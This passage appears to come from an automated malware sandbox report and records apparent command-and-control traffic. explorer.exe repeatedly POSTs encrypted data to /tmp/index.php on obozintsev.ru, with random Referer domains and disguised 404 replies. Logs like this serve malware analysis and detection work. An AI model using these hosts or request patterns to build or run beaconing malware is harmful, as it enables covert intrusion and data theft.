Nov 30, 2024 11:14:03.218429089 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:14:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49927	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:14:03.346157074 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lxgihqdoncikbgg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 215 Host: obozintsev.ru
Nov 30, 2024 11:14:03.346194983 CET	215	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 26 6b 2c 90 f5 76 0b 75 7b 36 fa 8f Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[&k,vu{6uTCVP%,b.Y?!\O:7+cNXAOaQ4a'Ko{l=OFCy
Nov 30, 2024 11:14:05.094419003 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:14:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49932	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:14:05.221851110 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pktfnvaxqpxmxps.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 232 Host: obozintsev.ru
Nov 30, 2024 11:14:05.221868992 CET	232	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 27 6b 2c 90 f5 76 0b 75 71 2f d8 ec Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -['k,vuq/g [j]S+sZHo^wrzF$Tz>7n]8^G5$@V.^&+3B9T8zr H
Nov 30, 2024 11:14:07.246759892 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:14:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49937	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:14:07.375758886 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gsuntxougdhs.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 265 Host: obozintsev.ru
Nov 30, 2024 11:14:07.375781059 CET	265	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 24 6b 2c 90 f5 76 0b 75 72 01 db ff Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[$k,vurMIDpp$~B&l#`?L?tGLfNHgHY<\z4*1#8)/RC8~9gC?Y)h
Nov 30, 2024 11:14:09.165790081 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:14:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49941	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:14:09.295814037 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://unxnurhhgcwb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 157 Host: obozintsev.ru
Nov 30, 2024 11:14:09.295829058 CET	157	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 25 6b 2c 90 f5 76 0b 75 26 15 da e4 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[%k,vu&,ybopTmw]^2=X_<S`e!rw%
Nov 30, 2024 11:14:11.135932922 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:14:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49946	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:14:11.306545019 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cvixokerumeto.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 158 Host: obozintsev.ru
Nov 30, 2024 11:14:11.306545019 CET	158	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 3a 6b 2c 90 f5 76 0b 75 62 3b b5 bd Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[:k,vub;`vz{86Vog3e>c\IVt,yu<-4
Nov 30, 2024 11:14:13.296889067 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:14:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49953	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:14:13.426032066 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fsnaumbblcik.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 228 Host: obozintsev.ru
Nov 30, 2024 11:14:13.426074028 CET	228	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 3b 6b 2c 90 f5 76 0b 75 7b 0d d6 87 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[;k,vu{_?bf:/P1mOw&8z=kO'Z\|N Q}Q+/R"^:J"!v5AuT,(Jo
Nov 30, 2024 11:14:15.211502075 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:14:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49959	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:14:15.336947918 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uwalktmlxvraf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: obozintsev.ru
Nov 30, 2024 11:14:15.336958885 CET	149	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 38 6b 2c 90 f5 76 0b 75 5b 0a b7 a8 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[8k,vu[XFwMwLx1hs5eIF(dRK1l$7F4Ti4*
Nov 30, 2024 11:14:17.129673004 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:14:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50061	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:15:27.765614033 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://omlavaayevr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 281 Host: obozintsev.ru
Nov 30, 2024 11:15:27.765676975 CET	281	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3f 09 c1 90 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA .[k,vu?x6jS_f1f$q9'wQ[G=[{&EdG-^b8ge?pPY ?73)Bqd`_ga~8P%
Nov 30, 2024 11:15:29.907083035 CET	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:15:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50062	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:15:37.719506025 CET	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iopuyoenyjytdheg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: obozintsev.ru
Nov 30, 2024 11:15:37.719540119 CET	112	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 1c db ed Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA .[k,vuXuag&S&>X
Nov 30, 2024 11:15:39.773937941 CET	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:15:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50065	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:15:48.782426119 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xajywliqqhjs.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 114 Host: obozintsev.ru
Nov 30, 2024 11:15:48.782447100 CET	114	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 08 d8 91 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA .[k,vuJiHkCj7+Iw:0@
Nov 30, 2024 11:15:50.871936083 CET	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:15:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50066	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
